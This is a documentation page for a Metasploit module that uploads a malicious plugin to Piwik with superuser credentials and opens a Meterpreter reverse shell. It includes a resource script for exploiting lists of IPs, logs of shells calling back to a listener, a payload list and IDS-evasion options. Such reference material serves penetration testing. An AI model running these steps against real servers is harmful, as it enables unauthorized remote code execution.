Piwik Superuser Plugin Upload - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/piwik_superuser_plugin_upload metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Piwik Superuser Plugin Upload
Module: exploit/unix/webapp/piwik_superuser_plugin_upload
Source code: modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb
Disclosure date: 2017-02-05
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module will generate a plugin, pack the payload into it and upload it to a server running Piwik. Superuser Credentials are required to run this module. This module does not work against Piwik 1 as there is no option to upload custom plugins. Piwik disabled custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you have to enable custom plugin uploads via the config file. Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using piwik_superuser_plugin_upload against a single host

Normally, you can use exploit/unix/webapp/piwik_superuser_plugin_upload this way:

msf > use exploit/unix/webapp/piwik_superuser_plugin_upload
msf exploit(piwik_superuser_plugin_upload) > show targets
    ... a list of targets ...
msf exploit(piwik_superuser_plugin_upload) > set TARGET target-id
msf exploit(piwik_superuser_plugin_upload) > show options
    ... show and set options ...
msf exploit(piwik_superuser_plugin_upload) > exploit

Using piwik_superuser_plugin_upload against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your piwik_superuser_plugin_upload will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/piwik_superuser_plugin_upload")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USERNAME: The Piwik username to authenticate with

  • PASSWORD: The Piwik password to authenticate with

Knowledge Base


Vulnerable Application


Piwik can be downloaded from the official site piwik.org. Older builds are also available from builds.piwik.org.

This module was tested with Piwik versions 2.14.0, 2.16.0, 2.17.1 and 3.0.1

Piwik disabled custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you have to enable custom plugin uploads via the config file.

Verification Steps


Install Piwik (Debian/Ubuntu)

  1. Install dependencies

    sudo apt install apache2 php5 php5-mysql \
      libapache2-mod-php5 mariadb-server unzip php5-gd php5-curl
    
  2. Download latest version of piwik (or the version of your choice from builds.piwik.org)

    wget https://builds.piwik.org/piwik.zip
    
  3. Unzip Piwik into webroot

    unzip -d /var/www/html/ piwik.zip
    
  4. Make the webserver user the owner of piwik

    chown -R www-data:www-data /var/www/html/
    
  5. Create a new user and database for piwik. If you want to run multiple versions in parallel use a different database for each install (user is optional). This example assumes your MySQL root password is password

    mysql -u root -ppassword -e "CREATE DATABASE piwik;"
    mysql -u root -ppassword -e "CREATE USER piwik@localhost;"
    mysql -u root -ppassword -e "SET PASSWORD FOR piwik@localhost=PASSWORD('piwik');"
    mysql -u root -ppassword -e "GRANT ALL PRIVILEGES ON piwik.* TO piwik@localhost;"
    mysql -u root -ppassword -e "FLUSH PRIVILEGES;"
    
  6. Add a config setting to PHP to stop piwik complaining about it

    echo always_populate_raw_post_data=-1 > /etc/php5/apache2/conf.d/99-piwik.ini
    
  7. Finally restart Apache HTTPD

    service apache2 restart
    

Pwn Piwik

  1. Install the application (see installation steps above)
  2. Start msfconsole
  3. Do: use [module path]
  4. Do: set RHOST [Domain/IP]
  5. Do: set RPORT [Port]
  6. Do: set TARGETURI [installation directory]
  7. Do: set SSL [True/False]
  8. Do: set USERNAME [valid Piwik superuser credentials]
  9. Do: set PASSWORD [valid Piwik superuser credentials]
  10. Do: run
  11. You should get a shell.

Options


TARGETURI

Path of the Piwik installation.

USERNAME

Valid username for a Piwik superuser account.

PASSWORD

Valid password for a Piwik superuser account.

Scenarios


Run with a installation of Piwik 3.0.1

msf > use exploit/unix/webapp/piwik_superuser_plugin_upload
msf exploit(piwik_superuser_plugin_upload) > set TARGETURI /piwik/
TARGETURI => /piwik/
msf exploit(piwik_superuser_plugin_upload) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(piwik_superuser_plugin_upload) > set username firefart
username => firefart
msf exploit(piwik_superuser_plugin_upload) > set password firefart
password => firefart
msf exploit(piwik_superuser_plugin_upload) > options

Module options (exploit/unix/webapp/piwik_superuser_plugin_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   firefart         yes       The Piwik password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.2     yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /piwik/          yes       The URI path of the Piwik installation
   USERNAME   firefart         yes       The Piwik username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Piwik

msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[+] Seems like the Marketplace plugin is already enabled
[*] Generating plugin
[+] Plugin SDsiXxPMgt generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:43169) at 2017-02-13 23:03:29 +0100
[+] Deleted plugins/SDsiXxPMgt/plugin.json
[+] Deleted plugins/SDsiXxPMgt/SDsiXxPMgt.php

meterpreter > sysinfo
Computer    : web
OS          : Linux web 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
Meterpreter : php/linux

Run against Piwik 2.x

msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 2.14.0
[*] Generating plugin
[+] Plugin zZETuwYkzB generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.2:43182) at 2017-02-13 23:05:27 +0100
[+] Deleted plugins/zZETuwYkzB/plugin.json
[+] Deleted plugins/zZETuwYkzB/zZETuwYkzB.php

Sample output of running with invalid credentials

msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:test...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with Piwik
[*] Exploit completed, but no session was created.

Sample output of running with non superuser user

msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using test:firefart...
[+] Authenticated with Piwik
[*] Checking if user test has superuser access
[-] Exploit aborted due to failure: no-access: Looks like user test has no superuser access
[*] Exploit completed, but no session was created.

Sample output of Piwik 3.x with disabled Marketplace plugin

msf exploit(piwik_superuser_plugin_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Trying to detect if target is running a supported version of piwik
[+] Detected Piwik installation
[*] Authenticating with Piwik using firefart:firefart...
[+] Authenticated with Piwik
[*] Checking if user firefart has superuser access
[+] User firefart has superuser access
[*] Trying to get Piwik version
[+] Detected Piwik version 3.0.1
[*] Checking if Marketplace plugin is active
[*] Marketplace plugin is not enabled, trying to enable it
[+] Marketplace plugin enabled
[*] Generating plugin
[+] Plugin TuwgJygjEu generated
[*] Uploading plugin
[*] Activating plugin and triggering payload
[*] Sending stage (33986 bytes) to 192.168.56.2
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.2:43246) at 2017-02-13 23:08:36 +0100
[+] Deleted plugins/TuwgJygjEu/plugin.json
[+] Deleted plugins/TuwgJygjEu/TuwgJygjEu.php

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/piwik_superuser_plugin_upload exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/piwik_superuser_plugin_upload

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show info

       Name: Piwik Superuser Plugin Upload
     Module: exploit/unix/webapp/piwik_superuser_plugin_upload
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-02-05

Provided by:
  FireFart

Available targets:
  Id  Name
  --  ----
  0   Piwik

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       The Piwik password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path of the Piwik installation
  USERNAME                    yes       The Piwik username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module will generate a plugin, pack the payload into it and 
  upload it to a server running Piwik. Superuser Credentials are 
  required to run this module. This module does not work against Piwik 
  1 as there is no option to upload custom plugins. Piwik disabled 
  custom plugin uploads in version 3.0.3. From version 3.0.3 onwards 
  you have to enable custom plugin uploads via the config file. Tested 
  with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.

References:
  https://firefart.at/post/turning_piwik_superuser_creds_into_rce/
  https://piwik.org/faq/plugins/faq_21/
  https://piwik.org/changelog/piwik-3-0-3/

Module Options


This is a complete list of options available in the unix/webapp/piwik_superuser_plugin_upload exploit:

msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show options

Module options (exploit/unix/webapp/piwik_superuser_plugin_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The Piwik password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path of the Piwik installation
   USERNAME                    yes       The Piwik username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Piwik

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/piwik_superuser_plugin_upload exploit:

msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show advanced

Module advanced options (exploit/unix/webapp/piwik_superuser_plugin_upload):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/piwik_superuser_plugin_upload module can exploit:

msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Piwik

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/piwik_superuser_plugin_upload exploit:

msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/piwik_superuser_plugin_upload exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/piwik_superuser_plugin_upload) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The target does not appear to be running a supported version of Piwik


Here is a relevant code snippet related to the "The target does not appear to be running a supported version of Piwik" error message:

155:	      'uri' => normalized_index
156:	    })
157:	    if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/
158:	      print_good('Detected Piwik installation')
159:	    else
160:	      fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik')
161:	    end
162:	
163:	    print_status("Authenticating with Piwik using #{username}:#{password}...")
164:	    res = send_request_cgi({
165:	      'method' => 'GET',

Can not extract login CSRF token


Here is a relevant code snippet related to the "Can not extract login CSRF token" error message:

175:	      match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/)
176:	      if match
177:	        login_nonce = match[1]
178:	      end
179:	    end
180:	    fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil?
181:	
182:	    cookies = res.get_cookies
183:	
184:	    res = send_request_cgi({
185:	      'method' => 'POST',

Failed to authenticate with Piwik


Here is a relevant code snippet related to the "Failed to authenticate with Piwik" error message:

199:	    if res && res.redirect? && res.redirection
200:	      # update cookies
201:	      cookies = res.get_cookies
202:	    else
203:	      # failed login responds with code 200 and renders the login form
204:	      fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik')
205:	    end
206:	    print_good('Authenticated with Piwik')
207:	
208:	    print_status("Checking if user #{username} has superuser access")
209:	    superuser = is_superuser?(cookies)

Looks like user <USERNAME> has no superuser access


Here is a relevant code snippet related to the "Looks like user <USERNAME> has no superuser access" error message:

208:	    print_status("Checking if user #{username} has superuser access")
209:	    superuser = is_superuser?(cookies)
210:	    if superuser
211:	      print_good("User #{username} has superuser access")
212:	    else
213:	      fail_with(Failure::NoAccess, "Looks like user #{username} has no superuser access")
214:	    end
215:	
216:	    print_status('Trying to get Piwik version')
217:	    piwik_version = get_piwik_version(cookies)
218:	    if piwik_version.nil?

Unable to detect Piwik version. Trying to continue.


Here is a relevant code snippet related to the "Unable to detect Piwik version. Trying to continue." error message:

214:	    end
215:	
216:	    print_status('Trying to get Piwik version')
217:	    piwik_version = get_piwik_version(cookies)
218:	    if piwik_version.nil?
219:	      print_warning('Unable to detect Piwik version. Trying to continue.')
220:	    else
221:	      print_good("Detected Piwik version #{piwik_version}")
222:	    end
223:	
224:	    if piwik_version == '1.x'

Piwik version 1 is not supported by this module


Here is a relevant code snippet related to the "Piwik version 1 is not supported by this module" error message:

220:	    else
221:	      print_good("Detected Piwik version #{piwik_version}")
222:	    end
223:	
224:	    if piwik_version == '1.x'
225:	      fail_with(Failure::NoTarget, 'Piwik version 1 is not supported by this module')
226:	    end
227:	
228:	    # Only versions after 3 have a seperate Marketplace plugin
229:	    if piwik_version && Rex::Version.new(piwik_version) >= Rex::Version.new('3')
230:	      marketplace_available = true

Can not check for Marketplace plugin


Here is a relevant code snippet related to the "Can not check for Marketplace plugin" error message:

241:	        'vars_get' => {
242:	          'module' => 'Marketplace',
243:	          'action' => 'index'
244:	        }
245:	      })
246:	      fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res
247:	      if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
248:	        print_status('Marketplace plugin is not enabled, trying to enable it')
249:	
250:	        res = send_request_cgi({
251:	          'method' => 'GET',

Marketplace plugin is not enabled, trying to enable it


Here is a relevant code snippet related to the "Marketplace plugin is not enabled, trying to enable it" error message:

243:	          'action' => 'index'
244:	        }
245:	      })
246:	      fail_with(Failure::UnexpectedReply, 'Can not check for Marketplace plugin') unless res
247:	      if res.code == 200 && res.body =~ /The plugin Marketplace is not enabled/
248:	        print_status('Marketplace plugin is not enabled, trying to enable it')
249:	
250:	        res = send_request_cgi({
251:	          'method' => 'GET',
252:	          'uri' => normalized_index,
253:	          'cookie' => cookies,

Can not extract Marketplace activate CSRF token


Here is a relevant code snippet related to the "Can not extract Marketplace activate CSRF token" error message:

261:	          match = res.body.match(/<a href=['"]index\.php\?module=CorePluginsAdmin&action=activate&pluginName=Marketplace&nonce=(\w+).*['"]>/)
262:	          if match
263:	            mp_activate_nonce = match[1]
264:	          end
265:	        end
266:	        fail_with(Failure::UnexpectedReply, 'Can not extract Marketplace activate CSRF token') unless mp_activate_nonce
267:	        res = send_request_cgi({
268:	          'method' => 'GET',
269:	          'uri' => normalized_index,
270:	          'cookie' => cookies,
271:	          'vars_get' => {

Can not enable Marketplace plugin. Please try to manually enable it.


Here is a relevant code snippet related to the "Can not enable Marketplace plugin. Please try to manually enable it." error message:

276:	          }
277:	        })
278:	        if res && res.redirect?
279:	          print_good('Marketplace plugin enabled')
280:	        else
281:	          fail_with(Failure::UnexpectedReply, 'Can not enable Marketplace plugin. Please try to manually enable it.')
282:	        end
283:	      else
284:	        print_good('Seems like the Marketplace plugin is already enabled')
285:	      end
286:	    end

Custom plugin uploads are disabled


Here is a relevant code snippet related to the "Custom plugin uploads are disabled" error message:

316:	    end
317:	
318:	    upload_nonce = nil
319:	    if res && res.code == 200
320:	      if res.body =~ /Plugin upload is disabled in config file/
321:	        fail_with(Failure::NotVulnerable, 'Custom plugin uploads are disabled')
322:	      end
323:	
324:	      match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
325:	      if match
326:	        upload_nonce = match[1]

Can not extract upload CSRF token


Here is a relevant code snippet related to the "Can not extract upload CSRF token" error message:

324:	      match = res.body.match(/<form.+id="uploadPluginForm".+nonce=(\w+)/m)
325:	      if match
326:	        upload_nonce = match[1]
327:	      end
328:	    end
329:	    fail_with(Failure::UnexpectedReply, 'Can not extract upload CSRF token') if upload_nonce.nil?
330:	
331:	    # plugin files to delete after getting our session
332:	    register_files_for_cleanup("plugins/#{plugin_name}/plugin.json")
333:	    register_files_for_cleanup("plugins/#{plugin_name}/#{plugin_name}.php")
334:	

Can not extract activate CSRF token


Here is a relevant code snippet related to the "Can not extract activate CSRF token" error message:

351:	      match = res.body.match(/<a.*href="index.php\?module=CorePluginsAdmin&amp;action=activate.+nonce=([^&]+)/)
352:	      if match
353:	        activate_nonce = match[1]
354:	      end
355:	    end
356:	    fail_with(Failure::UnexpectedReply, 'Can not extract activate CSRF token') if activate_nonce.nil?
357:	
358:	    print_status('Activating plugin and triggering payload')
359:	    send_request_cgi({
360:	      'method' => 'GET',
361:	      'uri' => normalized_index,

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • FireFart

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.